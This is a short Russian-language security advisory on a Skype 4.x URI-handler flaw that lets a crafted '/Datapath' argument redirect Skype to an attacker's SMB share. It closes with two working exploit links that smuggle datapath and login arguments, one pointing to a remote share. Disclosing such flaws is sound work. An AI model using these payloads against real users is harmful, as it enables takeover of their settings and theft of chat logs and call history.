Программа: Skype 4.x
Уязвимость позволяет удаленному злоумышленнику обойти ограничения
безопасности на целевой системе. Уязвимость существует из-за ошибки в проверке
входных данных передаваемых обработчику URI. Атакующий может вставить специально
составленный "/Datapath" аргумент, указывающий на злонамеренный разделяемый
ресурс SMB, что позволит, например, контролировать определенный настройки Skype
(например, настройки безопасности или прокси) и получить доступ к
конфиденциальной информации (например, логи чата и история звонков).
Успешное эксплуатирование уязвимости требует, чтобы пользователь Skype
перешел по специально составленному "skype:" URI и может зависеть от
используемого браузера.
Эксплоит:
<a href=skype:A"0x01/secondary0x01/datapath:"\\remotehost\share\exploit>Click
Me</a>
<a href=skype:A"0x01/secondary0x01/username:"test”0x01/password:”test>Click
Me</a>